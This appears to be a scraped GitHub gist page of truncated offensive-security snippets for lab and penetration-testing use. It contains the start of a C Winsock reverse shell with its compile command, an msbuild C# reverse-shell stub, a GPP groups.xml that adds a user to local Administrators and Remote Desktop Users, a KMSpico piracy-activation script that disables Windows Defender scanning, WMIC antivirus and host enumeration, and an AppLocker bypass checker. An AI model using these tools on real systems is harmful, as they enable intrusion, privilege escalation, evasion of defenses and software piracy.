brax braaaax

@braaaax
braaaax / procmon.sh
Last active March 15, 2018 06:24
look for new processes
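#!/bin/bash
# via ippsec
# Split command output on newlines only
IFS=$'\n'
old_process=$(ps -eo command)
while true; do
    new_process=$(ps -eo command)
    # Print only lines that appeared (>) or disappeared (<) since the last snapshot
    diff <(echo "$old_process") <(echo "$new_process") | grep '[<>]'
    sleep 1
    old_process=$new_process
done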
#!/bin/bash
if ! [ $(id -u) = 0 ]
then
echo "Run as root"
exit 1
fi
if [ -e ~/.xmodmaprc ];then
xmodmap ~/.xmodmaprc
braaaax / install_KMSpico.ps1
Created September 12, 2018 16:39
download and install kmspico -- lkys37en
$KMSUrl = "https://codeload.github.com/charygao/KMSpico_v10.2.0/zip/master"
$KMSDst = "C:\windows\temp\KMSpico.zip"
$KMSUnzip = "C:\windows\temp\KMSPico"
$KMSExe = "C:\Windows\Temp\KMSPico\KMSpico_v10.2.0-master\KMSpico Portable\AutoPico.exe"
if ((Get-CimInstance -ClassName Win32_OperatingSystem).name -match "Windows 10" -or (Get-CimInstance -ClassName Win32_OperatingSystem).name -match "Server 2016") {
Write-Host "Temporarily disabling Windows Defender Real time Scanning"
Set-MpPreference -ExclusionPath C:\temp\windows\
braaaax / wmic_cmds.txt
Last active March 9, 2019 17:12 — forked from xorrior/wmic_cmds.txt
Useful Wmic queries for host and domain enumeration
Host Enumeration:
--- OS Specifics ---
wmic os LIST Full (* To obtain the OS Name, use the "caption" property)
wmic computersystem LIST full
--- Anti-Virus ---
wmic /namespace:\\root\securitycenter2 path antivirusproduct
braaaax / Get-KerberosKeytab.ps1
Created February 16, 2019 13:43 — forked from 0xhexmex/Get-KerberosKeytab.ps1
Parses Kerberos Keytab files
param(
[Parameter(Mandatory)]
[string]$Path
)
#Created by Pierre.Audonnet@microsoft.com
#
#Got keytab structure from http://www.ioplex.com/utilities/keytab.txt
#
# keytab {
/* compile: i686-w64-mingw32-gcc -o brax.exe reverse.c -lws2_32 */
#include <winsock2.h>
#include <stdio.h>
#pragma comment(lib, "w2_32")
WSADATA wsaData;
SOCKET Winsock;
SOCKET Sock;
braaaax / gpo abuse
Created March 8, 2019 11:25 — forked from chryzsh/gpo abuse
add user to admin and rdp. put this in sysvol/guid/machine/preferences/groups/groups.xml
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><Group clsid="{6D4A79E4-529C-4481-ABD0-F5BD7EA93BA7}" name="Administrators (built-in)" image="2" changed="2019-03-07 17:32:24" uid="{ECC42B3A-5D61-4705-BC17-467C4A2764DE}"><Properties action="U" newName="" description="GPP - admins" deleteAllUsers="0" deleteAllGroups="0" removeAccounts="0" groupSid="S-1-5-32-544" groupName="Administrators (built-in)"><Members><Member name="lab\chry" action="ADD" sid="S-1-5-21-1805218588-1302490888-793887298-1113"/></Members></Properties></Group>
<Group clsid="{6D4A79E4-529C-4481-ABD0-F5BD7EA93BA7}" name="Remote Desktop Users (built-in)" image="2" changed="2019-03-07 17:33:38" uid="{5F8E65C1-F1BA-4207-8549-5D6606F8E7DF}"><Properties action="U" newName="" description="gpp - add chry rdp" deleteAllUsers="0" deleteAllGroups="0" removeAccounts="0" groupSid="S-1-5-32-555" groupName="Remote Desktop Users (built-in)"><Members><Member name="lab\chry" action="ADD" sid="S-1-5-21-1805218588-130
braaaax / csrev.xml
Created March 12, 2019 21:46
msbuild csharp reverse shell
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<Target Name="Hello">
<ClassExample />
</Target>
<UsingTask
TaskName="ClassExample"
TaskFactory="CodeTaskFactory"
AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
<Task>
braaaax / Applocker-bypass-checker.ps1
Created March 17, 2019 18:30
AppLocker Bypass Checker
# AppLocker Bypass Checker (Default Rules) v2.0
#
# One of the Default Rules in AppLocker allows everything in the folder C:\Windows to be executed.
# A normal user shouldn't have write permission in that folder, but that is not always the case.
# This script lists default ACL for the "BUILTIN\users" group looking for write/createFiles & execute authorizations
#
# @Author: Sparc Flow in "How to Hack a Fashion Brand"
#
# NOTE: change the group and root_folder variables to suit your needs
package main
import (
"bufio"
"bytes"